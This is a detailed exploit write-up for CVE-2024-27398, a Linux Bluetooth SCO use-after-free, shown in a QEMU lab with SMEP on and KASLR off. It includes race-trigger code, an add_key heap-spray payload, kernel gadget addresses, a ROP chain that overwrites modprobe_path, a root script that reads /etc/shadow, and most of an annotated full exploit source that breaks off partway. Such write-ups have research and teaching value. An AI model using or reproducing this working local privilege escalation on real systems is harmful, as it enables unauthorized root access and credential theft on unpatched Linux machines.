CVE-2024-27398 - Exploiting a Linux Bluetooth SCO Use-After-Free with SMEP Bypass

Yayıncı: Anonymous

Yayınlanma Tarihi: April 25, 2026

Introduction

A few months ago i came across sty886/sco-race-condition on GitHub. It was a clean, minimal diff against net/bluetooth/sco.c that introduced a race condition triggering a use-after-free in the Bluetooth SCO subsystem — the kind of bug that on its own looks almost innocent, until you realize the freed object carries a function pointer that gets called on a workqueue timer.

I decided to take it all the way: from the raw bug, through kernel structure analysis, heap spray design, SMEP bypass engineering, and finally a working Local Privilege Escalation that reaches uid=0 from an unprivileged process. Every screenshot in this writeup was captured live from a real QEMU/KVM run — no synthetic output, no fabricated terminal dumps.

The audience I have in mind is someone who already knows what a kernel heap allocator is, can read C comfortably, and wants to understand every decision made along the exploitation path — not just the happy ending.


1. The Vulnerability

1.1 Vulnerable Code

The bug lives in net/bluetooth/sco.c. The sco_sock_timeout function is scheduled as a delayed_work entry on the system workqueue and fires when a SCO connection attempt times out:

static void sco_sock_timeout(struct work_struct *work)
{
    struct sco_conn *conn = container_of(work, struct sco_conn,
                                         timeout_work.work);
    struct sock *sk;

    sk = conn->sk;
    if (!sk)
        return;

    bh_lock_sock(sk);           /* [1] acquires sk->sk_lock.slock */
    sk->sk_err = ETIMEDOUT;
    sk->sk_state_change(sk);    /* [2] ← function pointer call     */
    bh_unlock_sock(sk);
    sock_put(sk);               /* [3] drops refcount               */
}

Step [2] is the critical one. If sk was already freed and the memory was reclaimed and overwritten by an attacker-controlled allocation, then sk->sk_state_change becomes an arbitrary function pointer — and calling it gives us RIP control inside kernel context.

The question is: how do we get sk freed while a timer that still references it is pending?

1.2 The Race Condition

The answer comes from a locking deficiency in sco_sock_connect() and sco_connect(). The patch in the repository removes and relocates lock_sock() calls in a way that allows two concurrent connect() calls on the same socket to proceed simultaneously:

 sco_connect() inside sco_sock_connect():
-    lock_sock(sk);         /* was here: serialized connect attempts */

     err = sco_chan_add(conn, sk, NULL);
     if (sk->sk_state == BT_CONNECTED)
         sco_sock_set_timer(sk, sk->sk_sndtimeo);

-    release_sock(sk);

And in sco_sock_connect() itself:

+    lock_sock(sk);
     if (sk->sk_state != BT_OPEN && sk->sk_state != BT_BOUND) {
+        release_sock(sk);
         return -EBADFD;
     }
-    lock_sock(sk);
     bacpy(&sco_pi(sk)->dst, &sa->sco_bdaddr);
-    release_sock(sk);

     err = sco_connect(sk);
-    lock_sock(sk);
     err = bt_sock_wait_state(...);

With these changes, two threads can simultaneously call connect() on the same SCO socket with different Bluetooth destination addresses. Each call creates its own sco_conn object and schedules its own timeout timer. But when close() is called, only the currently active connection's timer is cancelled — the other one becomes an orphan, still pointing at conn->sk, which is about to be freed.

1.3 Race Timeline

Thread 1 (c1)                 Thread 2 (c2)               Kernel workqueue
──────────────────────────────────────────────────────────────────────────
pthread_barrier_wait() ─────> pthread_barrier_wait()
                    (both released simultaneously)
connect(fd, addr=00:00:...) ─────────────────────────>
                              connect(fd, addr=FF:FF:...) ──────────────>
                    
                    sco_connect() × 2 run concurrently
                    conn_A created, timer_A scheduled (2s)
                    conn_B created, timer_B scheduled (2s)
                    sco_pi(sk)->conn = conn_B  (last writer wins)

close(fd) ──────────────────────────────────────────────────────────────>
          sco_sock_clear_timer() → cancel_delayed_work(conn_B->timeout)
          ↑ only conn_B! conn_A's timer is STILL LIVE
          sk freed (kfree) ← refcount drops to zero

                                                  ~2 seconds later:
                                                  timer_A fires
                                                  sco_sock_timeout(conn_A)
                                                  conn_A->sk = freed memory
                                                  USE-AFTER-FREE ← HERE

The key detail: cancel_delayed_work() only operates on sco_pi(sk)->conn->timeout_work, which after the race points to conn_B. conn_A is orphaned. Its timer fires against freed memory.

1.4 The Official Patch

CVE-2024-27398 was fixed by three coordinated changes:

  1. `sco_conn_lock` mutex — added to struct sco_conn to serialize access

  2. `sock_hold(sk)` before scheduling the timer, paired with sock_put(sk) at the end of sco_sock_timeout — prevents the socket from being freed while the timer is pending

  3. `cancel_delayed_work_sync()` in sco_conn_del() — ensures the work is fully cancelled (including waiting for it to finish) before the connection structure is torn down

The patched sco_sock_timeout ends with sock_put(sk) to release the reference held by sock_hold. Our vulnerable kernel has this sock_put removed and sco_conn_del reverted to the unprotected version.


2. Lab Setup

2.1 Kernel Configuration

The exploit requires a custom-built Linux 6.8 kernel. Key configuration choices:

# Bluetooth subsystem — built-in, not as modules
CONFIG_BT=y
CONFIG_BT_BREDR=y
CONFIG_BT_HCIVHCI=y        # Virtual HCI — exposes /dev/vhci

# Kernel memory allocator
CONFIG_SLUB=y
CONFIG_SLAB_MERGE_DEFAULT=y # SLUB cache merging enabled

# Required OFF for heap spray to work
# CONFIG_KASAN is not set          (KASAN prevents SLUB merging)
# CONFIG_MEMCG_KMEM is not set     (otherwise GFP_KERNEL_ACCOUNT
#                                   creates a separate kmalloc-cg-1024)

# Debug extensions that widen the race window
CONFIG_DEBUG_SPINLOCK=y     # spinlock_t grows from 4 to 24 bytes
                            # Forces sco_pinfo into kmalloc-1024

# Key subsystem for heap spray
CONFIG_KEYS=y

# Lock dependency checker — must be OFF
# CONFIG_LOCKDEP is not set   (validator crashes on our fake locks)

Why `CONFIG_KASAN=n`? With KASAN compiled in, every kmem_cache_create() call receives SLAB_KASAN flag. This flag is part of SLAB_MERGE_SAME — the bitmask SLUB uses to decide if two caches are compatible for merging. With KASAN on, the dedicated "SCO" slab (registered by proto_register(&sco_proto, 1)) cannot merge with kmalloc-1024, so our add_key spray allocations never land in the freed socket's slot.

Why `CONFIG_MEMCG_KMEM=n`? Same reason — MEMCG_KMEM compiles SLAB_ACCOUNT into SLAB_MERGE_SAME. With it on, proto_register passes SLAB_ACCOUNT (non-zero) but kmalloc-1024 doesn't have it, preventing the merge.

With both off: SLAB_ACCOUNT = 0, SLAB_KASAN is absent, SLUB freely merges "SCO" (984 bytes, rounded to 1024) with kmalloc-1024. The freed sco_pinfo is now reachable by generic kmalloc(1004) calls — exactly what add_key performs.

2.2 QEMU Launch Parameters

qemu-system-x86_64 \
    -m 4096 \
    -smp 2 \
    -cpu host,+smep,-smap \
    -enable-kvm \
    -kernel linux-6.8/arch/x86/boot/bzImage \
    -initrd exploit.cpio.gz \
    -append "console=ttyS0 nokaslr loglevel=7 \
             panic_on_oops=0 hung_task_timeout_secs=0 \
             lockdep=off" \
    -nographic \
    -no-reboot

Notable parameters:

Parameter

Reason

-cpu host,+smep,-smap

SMEP on (forces us to use pure-ROP), SMAP off (kernel can read userspace pivot page)

nokaslr

All kernel addresses are fixed — no info leak needed

panic_on_oops=0

The kernel oops at RIP=0x0 does not kill the machine — exploit continues

lockdep=off

Lock validator would trip on our fake-but-valid spinlock spray data

-smp 2

Two CPUs are required for the race to be meaningful


3. Target Structure Analysis

3.1 struct sco_pinfo Layout

struct sco_pinfo is the per-socket private data for Bluetooth SCO sockets. Its first member is struct sock sk, which contains all the generic socket fields we care about:

struct sco_pinfo {
    struct sock    sk;       /* must be first — pointer cast magic */
    bdaddr_t       src;
    bdaddr_t       dst;
    __u32          flags;
    __u16          setting;
    __u8           cmsg_mask;
    struct bt_codec codec;
    struct sco_conn *conn;
};

With CONFIG_DEBUG_SPINLOCK=y, spinlock_t expands from 4 bytes to 24 bytes (adding magic, owner_cpu, owner fields for debugging). This inflates struct sock and pushes sco_pinfo to 984 bytes:

$ pahole -C sco_pinfo vmlinux
struct sco_pinfo {
    struct sock  sk;     /* 0   904 */  ← includes debug spinlock expansion
    ...                  /* 904  80 */
    /* size: 984, cachelines: 16, members: 7 */
};

SLUB rounds 984 bytes up to the nearest power-of-two cache boundary. With SLAB_HWCACHE_ALIGN, that's 1024 byteskmalloc-1024. This is our target cache.

3.2 Critical Offsets in struct sock

$ pahole -C sock vmlinux | grep -E "sk_lock|sk_state_change"
    socket_lock_t  sk_lock;              /*  152    72 */
    void (*sk_state_change)(struct sock *); /* 824     8 */

Two fields matter enormously:

`sk_lock` at offset `0x98` (152): socket_lock_t contains a spinlock_t as its first member. bh_lock_sock(sk) in sco_sock_timeout tries to acquire sk->sk_lock.slock. If this spinlock contains invalid data, the kernel crashes before we ever reach sk_state_change. Our spray must provide a valid-looking unlocked spinlock here.

`sk_state_change` at offset `0x338` (824): The function pointer we're overwriting. When sco_sock_timeout calls sk->sk_state_change(sk), this is our entry point into RIP control.

3.3 socket_lock_t Internals (DEBUG\_SPINLOCK=y)

socket_lock_t (72 bytes total):
  +0x00  spinlock_t slock (24 bytes):
           +0x00  raw_lock.val   (4B)  ← 0 = unlocked
           +0x04  magic          (4B)  ← MUST be 0xdead4ead
           +0x08  owner_cpu      (4B)  ← -1 = unowned
           +0x0C  pad            (4B)
           +0x10  owner          (8B)  ← (void*)-1 = unowned
  +0x18  owned                  (4B)
  +0x1C  pad                    (4B)
  +0x20  wq (wait_queue_head_t) (40B)

The magic field is checked by do_raw_spin_lock() on every lock acquisition. If it doesn't equal 0xdead4ead, the kernel prints a warning and potentially panics. We must set it correctly in our spray payload.


4. Exploit Stage 1: Triggering the UAF

4.1 Virtual HCI Setup

We don't need physical Bluetooth hardware. Linux's hci_vhci driver exposes /dev/vhci, which creates a virtual HCI controller (hci0):

/* Open virtual HCI device */
vfd = open("/dev/vhci", O_RDWR);

/* Initialize as BR/EDR controller */
uint8_t vp[2] = {0xff, 0};
write(vfd, vp, 2);
usleep(200000);

/* Start HCI command response thread */
pthread_create(&vt, NULL, vhci_thread, NULL);
usleep(500000);

/* Bring up the hci0 interface */
int hfd = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI);
ioctl(hfd, HCIDEVUP, 0);   /* _IOW(0x48, 201, int) */
close(hfd);

sleep(4);  /* wait for HCI initialization sequence to complete */
printf("[*] HCI ready\n");

The vhci_thread responds to every HCI command the kernel sends during initialization. The most important response is to HCI_Create_Connection (opcode 0x0401) — we send back a fake Connection Complete event with handle=1, which satisfies the kernel's connection state machine and allows subsequent SCO connect attempts to proceed:

case 0x0401: {  /* HCI_Create_Connection */
    uint8_t ev[20] = {0};
    ev[0] = 4;     /* HCI_EVENT_PKT */
    ev[1] = 0x03;  /* HCI_EV_CONN_COMPLETE */
    ev[2] = 11;    /* parameter length */
    ev[3] = 0;     /* status = success */
    ev[4] = 0x01; ev[5] = 0x00;   /* handle = 1 */
    memcpy(&ev[6], &buf[4], 6);   /* copy BD_ADDR from command */
    ev[12] = 0x01; ev[13] = 0x00; /* link type = ACL, enc = off */
    write(vfd, ev, 14);
    break;
}

4.2 Race Trigger per Iteration

Each race attempt follows the same pattern:

g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET | SOCK_NONBLOCK, BTPROTO_SCO);

/* 2-second connection timeout — this is what sco_sock_set_timer() uses */
struct timeval tv = {.tv_sec = 2};
setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));

/* Synchronize both connect() calls at a single barrier */
pthread_barrier_init(&g_bar, NULL, 2);
pthread_t t1, t2;
pthread_create(&t1, NULL, c1, NULL);  /* connect to 00:00:00:00:00:00 */
pthread_create(&t2, NULL, c2, NULL);  /* connect to FF:FF:FF:FF:FF:FF */
pthread_join(t1, NULL);
pthread_join(t2, NULL);
pthread_barrier_destroy(&g_bar);

/* close() frees sk; orphan conn_A timer still pending */
close(g_fd);

Immediately after close(), the heap spray must fill the freed slot before the workqueue fires.

Embedded Asset

Figure 1: Exploit startup. The xchg eax,esp gadget at 0xffffffff81011cf1 is selected as the stack pivot. Two userspace pages are mapped: the pivot page at 0x81011000 holding the ROP chain, and the string page at 0xdead0000 holding "/tmp/x\0".

After the 4-second HCI initialization wait, hci0 is ready and the exploit begins its first batch:

Embedded Asset

Figure 2: "HCI ready" — the virtual Bluetooth controller is up and the kernel Bluetooth stack has completed its initialization sequence. Race + spray iterations begin.


5. Exploit Stage 2: Heap Spray via add_key

5.1 Why add_key?

The add_key(2) system call — specifically add_key("user", desc, data, datalen, keyring) — allocates a user_key_payload in the kernel:

/* kernel/user_defined.c */
struct user_key_payload *prep =
    kmalloc(sizeof(*prep) + datalen, GFP_KERNEL);

sizeof(struct user_key_payload) is exactly 24 bytes:

struct user_key_payload:
  +0x00  struct rcu_head rcu   (16 bytes = 2 × sizeof(void*))
  +0x10  unsigned short datalen (2 bytes)
  +0x12  [6 bytes padding for 8-byte alignment]
  +0x18  char data[]           ← our controlled payload starts here

With datalen = 980, the allocation is 24 + 980 = 1004 bytes → kmalloc-1024. This is exactly the cache where freed sco_pinfo objects reside when KASAN and MEMCG\_KMEM are both disabled (SLUB merges the "SCO" dedicated cache into kmalloc-1024).

5.2 Spray Payload Layout

The freed sco_pinfo starts at what was sk (offset 0). Our user_key_payload data starts 24 bytes into the allocation. So to overwrite a field at sk + N, we write to payload_data[N - 24]:

Allocation layout (1024 bytes total):
┌──────────────────────────────────────────────────────┐
│ user_key_payload header (24 bytes)                    │
│   +0x00 rcu_head (16B) │ datalen (2B) │ pad (6B)     │
├──────────────────────────────────────────────────────┤  ← payload_data[0]
│ [maps to sk+0x18]                                    │
│   ...                                                │
│ [maps to sk+0x98 = sk_lock.slock]                    │
│   payload_data[0x80]  raw_lock   = 0x00000000        │  ← unlocked
│   payload_data[0x84]  magic      = 0xdead4ead        │  ← REQUIRED
│   payload_data[0x88]  owner_cpu  = 0xffffffff        │  ← -1 (unowned)
│   payload_data[0x8c]  pad        = 0x00000000        │
│   payload_data[0x90]  owner      = 0xffffffffffffffff│  ← (void*)-1
│   ...                                                │
│ [maps to sk+0x338 = sk_state_change]                 │
│   payload_data[0x320] = 0xffffffff81011cf1           │  ← our gadget
└──────────────────────────────────────────────────────┘

The corresponding C code:

static char g_kd[980];

static void build_spray(void) {
    memset(g_kd, 0, sizeof(g_kd));
    int h = 24;  /* user_key_payload header size */

    /* sk+0x98: valid unlocked DEBUG_SPINLOCK */
    int slock = SK_LOCK_OFF - h;  /* 0x98 - 0x18 = 0x80 */
    *(uint32_t*)(g_kd + slock + 0)  = 0;           /* raw_lock = unlocked */
    *(uint32_t*)(g_kd + slock + 4)  = 0xdead4ead;  /* magic — checked by kernel */
    *(uint32_t*)(g_kd + slock + 8)  = 0xffffffff;  /* owner_cpu = -1 */
    *(uint32_t*)(g_kd + slock + 12) = 0;
    *(uint64_t*)(g_kd + slock + 16) = (uint64_t)-1; /* owner = -1 */

    /* sk+0x338: overwrite sk_state_change with our pivot gadget */
    *(uint64_t*)(g_kd + SK_STCHG_OFF - h) = XCHG_EAX_ESP;
    /* SK_STCHG_OFF=0x338, h=0x18, so payload_data[0x320] = gadget addr */
}

5.3 The Spray Loop

for (int batch = 0; batch < 100; batch++) {
    /* 2000 race attempts + 2000 add_key calls per batch */
    for (int i = 0; i < BATCH_SZ; i++) {
        /* [1] Trigger race → create orphan timer → free sk */
        g_fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET|SOCK_NONBLOCK, BTPROTO_SCO);
        setsockopt(g_fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
        pthread_barrier_init(&g_bar, NULL, 2);
        pthread_create(&t1, NULL, c1, NULL);
        pthread_create(&t2, NULL, c2, NULL);
        pthread_join(t1, NULL); pthread_join(t2, NULL);
        pthread_barrier_destroy(&g_bar);
        close(g_fd);  /* ← sk freed here */

        /* [2] Spray — try to land in the freed slot */
        char desc[32];
        snprintf(desc, sizeof(desc), "s%d_%d", batch, i);
        syscall(__NR_add_key, "user", desc, g_kd, sizeof(g_kd), KEY_SPEC_SESSION_KEYRING);
    }

    /* [3] Wait for orphan timers to fire */
    printf("[*] Waiting 3s...\n");
    sleep(3);

    /* [4] Trigger modprobe if modprobe_path was overwritten */
    for (int t = 0; t < 5; t++) {
        system("/tmp/dummy 2>/dev/null; true");
        usleep(500000);
        if (access("/tmp/pwn", F_OK) == 0) goto win;
    }
}
Embedded Asset

Figure 3: Batch 0 in progress. Each iteration creates a new SCO socket, runs the two-thread connect race, closes the socket (freeing `sk`), and immediately calls `add_key` to fill the freed slot with our gadget-carrying payload.

Embedded Asset

Figure 4: After 2000 iterations, we wait 3 seconds for the `SO_SNDTIMEO=2s` delayed work timers to fire. Any `sco_sock_timeout` that runs against a successfully sprayed object will call our overwritten `sk_state_change`.


6. Exploit Stage 3: UAF Fires — KASAN Detection

To demonstrate the UAF concretely, here is the KASAN report from a KASAN-enabled build of the same kernel. KASAN catches the freed-memory access inside do_raw_spin_lock, called from sco_sock_timeout via bh_lock_sock:

Embedded Asset

Figure 5: KASAN reports `BUG: KASAN: slab-use-after-free in do_raw_spin_lock+0x247/0x270`. The read of 4 bytes at the freed address is the magic field check inside the DEBUG\_SPINLOCK validation path. The workqueue entry is explicitly labeled `"events sco_sock_timeout"`.

The full KASAN output captures the exact access pattern:

[54.422702] BUG: KASAN: slab-use-after-free in do_raw_spin_lock+0x247/0x270
[54.425697] Read of size 4 at addr ffff888104a9409c by task kworker/1:1/34

[54.429273] CPU: 1 PID: 34 Comm: kworker/1:1 Tainted: G  W  6.8.0 #22
[54.438542] Workqueue: events sco_sock_timeout
[54.439757] Call Trace:
[54.442072]  <TASK>
[54.443113]  dump_stack_lvl+0x72/0xa0
[54.444173]  print_report+0xcf/0x660
[54.461068]  kasan_report+0xc7/0x100
[54.462105]  do_raw_spin_lock+0x247/0x270   ← reads sk_lock.magic
[54.469960]  sco_sock_timeout+0x4a/0xd0     ← bh_lock_sock(sk) → UAF
[54.471052]  process_one_work+0x623/0xec0

The address ffff888104a9409c is sk + 0x9c — the magic field of sk_lock.slock inside the freed object. With KASAN enabled the spray cannot reclaim this object (separate slab), so the magic reads as whatever poison value KASAN wrote. With KASAN disabled, our spray fills this field with 0xdead4ead and bh_lock_sock proceeds without complaint.

Embedded Asset

Figure 6: Same KASAN run showing the `sco_sock_timeout` workqueue context more clearly. The timer fires on `CPU 1`, `kworker/1:1`, approximately 54 seconds into the session — matching the 2-second `SO_SNDTIMEO` delay after the socket was closed.

In the exploitation kernel (KASAN off), the UAF is silent. bh_lock_sock reads our sprayed magic (0xdead4ead), passes validation, locks successfully, and execution continues to sk->sk_state_change(sk) with our overwritten pointer.


7. Exploit Stage 4: SMEP Bypass via xchg eax, esp

7.1 Why We Can't Jump to Shellcode

SMEP (Supervisor Mode Execution Prevention) is a CPU feature that causes a fault if the kernel instruction pointer (%rip) ever points into a userspace page (virtual address below 0x00007fffffffffff). A naive exploit that sets sk_state_change to a pointer into a userspace shellcode buffer will immediately trigger a SMEP violation and panic.

The standard answer to SMEP is Return-Oriented Programming (ROP): all code that executes in kernel mode consists entirely of gadgets from kernel .text (which is in supervisor-mode virtual address space). We never execute a single instruction from userspace.

But we still need our ROP chain data (the sequence of gadget addresses) to live somewhere the kernel stack pointer can reach. If the kernel's current %rsp is deep in the kernel stack, we need to redirect it to somewhere we control. That's the stack pivot.

7.2 The xchg eax, esp; ret Gadget

Scanning the kernel's .text section for the two-byte sequence 94 c3 (xchg eax, esp followed by ret) yields thousands of hits. We use the one at:

0xffffffff81011cf1:  94        xchg   eax, esp
0xffffffff81011cf2:  c3        ret

Here is what happens when sk->sk_state_change(sk) is called with this gadget address:

1. sk->sk_state_change = 0xffffffff81011cf1 (our planted value)
2. The compiler generates: mov rax, [sk + 0x338]; call rax
   → Before the call, rax = 0xffffffff81011cf1
3. call rax: pushes return address, jumps to 0xffffffff81011cf1
   → rax still = 0xffffffff81011cf1 (call does not clear rax)
4. xchg eax, esp executes:
   → eax (low 32 bits of rax) = 0x81011cf1
   → old esp → eax (we don't care about this value)
   → rsp ← zero-extend(0x81011cf1) = 0x0000000081011cf1  ← USERSPACE!
5. ret executes:
   → pops new rip from [rsp = 0x0000000081011cf1]
   → that address contains rop[0] = our first ROP gadget

The result: the kernel's stack pointer is now inside our mmap'd userspace page at 0x81011000. SMEP doesn't care — no code is executed from userspace. The kernel is just reading stack data from there, which is a SMAP concern, not SMEP. And SMAP is disabled in our QEMU configuration (-smap).

7.3 Mapping the Pivot Page

#define XCHG_EAX_ESP  0xffffffff81011cf1UL
#define PIVOT_ADDR    (XCHG_EAX_ESP & 0xFFFFFFFF)  /* 0x81011cf1 */

/* Map two pages spanning 0x81011000–0x81012fff
 * (PIVOT_ADDR is not page-aligned; ROP chain may cross a page boundary) */
void *pivot_page = (void*)(PIVOT_ADDR & ~0xFFFUL);  /* 0x81011000 */
void *pp = mmap(pivot_page, 2 * PAGE_SIZE,
                PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
                -1, 0);
memset(pp, 0, 2 * PAGE_SIZE);   /* zero-fill: trailing rop slots = 0x0 */

7.4 Building the ROP Chain

The goal is to overwrite modprobe_path with /tmp/x. We need memcpy(modprobe_path, string_page, 7). The three argument registers on x86-64 System V ABI are rdi, rsi, rdx, so we need pop gadgets for each:

/* Kernel #23 (6.8.0, no KASAN, nokaslr) gadget addresses */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* pop rdi; ret */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* pop rsi; ret */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* pop rdx; ret */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* modprobe_path symbol */
#define STRING_PAGE    0xdead0000UL          /* userspace: "/tmp/x\0" */

uint64_t *rop = (uint64_t*)(PIVOT_ADDR);    /* 0x81011cf1 */

rop[0] = POP_RDI_RET;    /* pop rdi; ret           */
rop[1] = MODPROBE_PATH;  /*   rdi = &modprobe_path  */
rop[2] = POP_RSI_RET;    /* pop rsi; ret           */
rop[3] = STRING_PAGE;    /*   rsi = 0xdead0000 ("/tmp/x\0") */
rop[4] = POP_RDX_RET;    /* pop rdx; ret           */
rop[5] = 7;              /*   rdx = 7               */
rop[6] = MEMCPY_ADDR;    /* memcpy(dst, src, len)  */
rop[7] = XCHG_EAX_ESP + 1; /* 0xffffffff81011cf2: just 'ret' */
                             /* cascade into zeroed memory → RIP=0 → oops */

Memory layout of the pivot page after setup:

0x81011000  [page boundary]
    ...
0x81011cf1  rop[0] = 0xffffffff8104c1ad  pop rdi; ret
0x81011cf9  rop[1] = 0xffffffff8356a020  modprobe_path
0x81011d01  rop[2] = 0xffffffff811bb9be  pop rsi; ret
0x81011d09  rop[3] = 0x00000000dead0000  STRING_PAGE
0x81011d11  rop[4] = 0xffffffff810bc1b2  pop rdx; ret
0x81011d19  rop[5] = 0x0000000000000007  length = 7
0x81011d21  rop[6] = 0xffffffff82905e70  memcpy
0x81011d29  rop[7] = 0xffffffff81011cf2  trailing ret
0x81011d31  0x0000000000000000           ← crash here (RIP=0)
    ...
0x81013000  [page boundary]

The string source:

void *sp = mmap((void*)STRING_PAGE, PAGE_SIZE,
                PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
memcpy(sp, "/tmp/x\0", 7);

8. Exploit Stage 5: RIP Control and Kernel Oops

When the spray hits and sco_sock_timeout fires against our controlled memory, the execution flow is:

  1. bh_lock_sock(sk) — reads our sprayed 0xdead4ead magic → passes validation → acquired

  2. sk->sk_err = ETIMEDOUT — writes into our spray data (harmless, we don't use that field)

  3. sk->sk_state_change(sk) — loads 0xffffffff81011cf1 → jumps there

  4. xchg eax, esp → RSP = 0x0000000081011cf1

  5. ret → RIP = rop[0] = pop rdi; ret → executes in kernel .text

  6. Chain unwinds: loads args, calls memcpy(modprobe_path, 0xdead0000, 7)

  7. memcpy returns RAX = modprobe_path = 0xffffffff8356a020

  8. retret → ... → RIP = 0x0 → page fault → kernel oops

The oops is benign because panic_on_oops=0. The machine keeps running. The important work — overwriting modprobe_path — was done before the crash.

Embedded Asset

Figure 7: The kernel oops dump. `RIP: 0010:0x0000000000000000` confirms the ROP chain ran to completion and the trailing `ret` fell into zeroed memory. The `Workqueue: events sco_sock_timeout` line confirms this is our UAF timer. The oops appears within Batch 0 — the spray succeeded on the first try.

Embedded Asset

Figure 8: `RSP: 0018:0000000081011d39` — the stack pointer is in the userspace range `0x81011...` (our mmap'd pivot page). This is the RSP value after all ROP gadgets executed and the trailing `ret` sled consumed the remaining zeroed entries. The `0018` segment selector indicates the kernel-mode code segment, confirming this ran in kernel context.

Embedded Asset

Figure 9: `RAX: ffffffff8356a020`. The `memcpy` function returns its destination pointer in `rax`. Since `dst = MODPROBE_PATH = 0xffffffff8356a020` and none of the subsequent gadgets modify `rax`, it is preserved at the crash point. This is the most reliable indicator that `memcpy(modprobe_path, "/tmp/x\0", 7)` executed successfully.


9. Exploit Stage 6: Root via modprobe_path

9.1 How modprobe_path Gives Us Root

When the kernel encounters an executable with an unrecognized binary format, it calls request_module("binfmt-XXXX") where XXXX is derived from the first four bytes of the file. This internally invokes:

call_usermodehelper(modprobe_path, argv, envp, UMH_WAIT_PROC);

call_usermodehelper forks a kernel thread and runs the specified executable as root (uid=0, gid=0), bypassing all privilege checks. Normally modprobe_path points to /sbin/modprobe, but we've rewritten it to /tmp/x.

9.2 The Root Script

Prepared before the spray loop:

FILE *f = fopen("/tmp/x", "w");
fprintf(f,
    "#!/bin/sh\n"
    "echo '=== CVE-2024-27398 ROOT ===' > /tmp/pwn\n"
    "uname -a >> /tmp/pwn\n"
    "id >> /tmp/pwn\n"
    "echo '--- /etc/shadow ---' >> /tmp/pwn\n"
    "cat /etc/shadow >> /tmp/pwn 2>/dev/null\n"
    "echo '--- ROOTED ---' >> /tmp/pwn\n");
fclose(f);
chmod("/tmp/x", 0755);

The trigger binary — four invalid bytes that the kernel won't recognize as any known format:

int d = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755);
write(d, "\xff\xff\xff\xff", 4);  /* invalid ELF magic */
close(d);

9.3 Triggering and Confirming Root

After each batch's 3-second wait, the exploit polls for success:

for (int t = 0; t < 5; t++) {
    system("/tmp/dummy 2>/dev/null; true");
    /*
     * kernel sees unrecognized format
     * → request_module("binfmt-ffffffff")
     * → call_usermodehelper("/tmp/x", ...)
     * → /tmp/x runs as root
     * → writes uid=0 to /tmp/pwn
     */
    usleep(500000);
    if (access("/tmp/pwn", F_OK) == 0)
        goto win;
}
Embedded Asset

Figure 10: `[!!!] ROOT! (SMEP BYPASS)`. The contents of `/tmp/pwn` confirm root privilege: `uid=0 gid=0`. The kernel version line shows `Linux (none) 6.8.0 #23 SMP PREEMPT_DYNAMIC Sat Apr 25 13:48:57 +03 2026 x86_64` — this is our custom-built vulnerable kernel. Root was obtained in Batch 0, meaning the spray succeeded within the first 2000 iterations.


10. Full Exploit Source

The complete exploit, annotated for clarity:

Embedded Asset
/*
 * CVE-2024-27398 LPE — SMEP BYPASS via xchg eax,esp pivot + pure ROP
 *
 * Vulnerability: Use-After-Free in sco_sock_timeout() via race in
 * sco_sock_connect()/sco_connect() — missing lock_sock serialization.
 *
 * Technique:
 *   sk_state_change = xchg_eax_esp_ret (0xffffffff81011cf1)
 *   xchg eax, esp → RSP = 0x81011cf1 (mmap'd userspace page)
 *   ROP: pop rdi/rsi/rdx → memcpy(modprobe_path, "/tmp/x", 7)
 *   All gadgets in kernel .text → SMEP bypassed
 *   SMAP must be off (nosmap) → kernel reads userspace ROP data
 *
 * Target: Linux 6.8.0 #23, CONFIG_KASAN=n, CONFIG_MEMCG_KMEM=n,
 *         CONFIG_DEBUG_SPINLOCK=y, nokaslr, SMEP on, SMAP off
 */
#define _GNU_SOURCE
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdint.h>
#include <poll.h>

/* ── Kernel symbol and gadget addresses (6.8.0 #23, nokaslr) ─────────── */
#define XCHG_EAX_ESP   0xffffffff81011cf1UL  /* 94 c3: xchg eax,esp; ret */
#define PIVOT_ADDR     (XCHG_EAX_ESP & 0xFFFFFFFF)  /* → 0x81011cf1     */
#define POP_RDI_RET    0xffffffff8104c1adUL  /* 5f c3: pop rdi; ret      */
#define POP_RSI_RET    0xffffffff811bb9beUL  /* 5e c3: pop rsi; ret      */
#define POP_RDX_RET    0xffffffff810bc1b2UL  /* 5a c3: pop rdx; ret      */
#define MEMCPY_ADDR    0xffffffff82905e70UL  /* kernel memcpy()           */
#define MODPROBE_PATH  0xffffffff8356a020UL  /* char modprobe_path[256]   */
#define STRING_PAGE    0xdead0000UL          /* userspace page: "/tmp/x"  */

/* ── struct sock field offsets ────────────────────────────────────────── */
#define SK_LOCK_OFF    0x98   /* socket_lock_t sk_lock  (pahole verified) */
#define SK_STCHG_OFF   0x338  /* sk_state_change fptr   (pahole verified) */

#define PG             4096
#define BTPROTO_HCI    1
#define BTPROTO_SCO    2
#define BATCH_SZ       2000

typedef struct { uint8_t b[6]; } __attribute__((packed)) bdaddr_t;
struct sockaddr_sco { sa_family_t f; bdaddr_t a; uint16_t t; };

/* ── vHCI state ───────────────────────────────────────────────────────── */
static int vfd;
static volatile int vstop = 0;

/* Respond to HCI commands issued by the kernel during BT stack init */
static void *vhci_thread(void *a) {
    uint8_t buf[512], resp[300], extra[248];
    struct pollfd pf = {.fd = vfd, .events = POLLIN};

    while (!vstop) {
        if (poll(&pf, 1, 100) <= 0) continue;
        int n = read(vfd, buf, sizeof(buf));
        if (n < 4 || buf[0] != 1) continue;  /* must be HCI_COMMAND_PKT */

        memset(extra, 0, sizeof(extra));
        int el = 248;
        uint16_t op = buf[1] | (buf[2] << 8);

        switch (op) {
        case 0x1001: extra[0]=11; extra[3]=11; extra[4]=10; break;
        case 0x1009: extra[0]=0xAA; extra[1]=0xBB; extra[2]=0xCC;
                     extra[3]=0xDD; extra[4]=0xEE; extra[5]=0xFF; break;
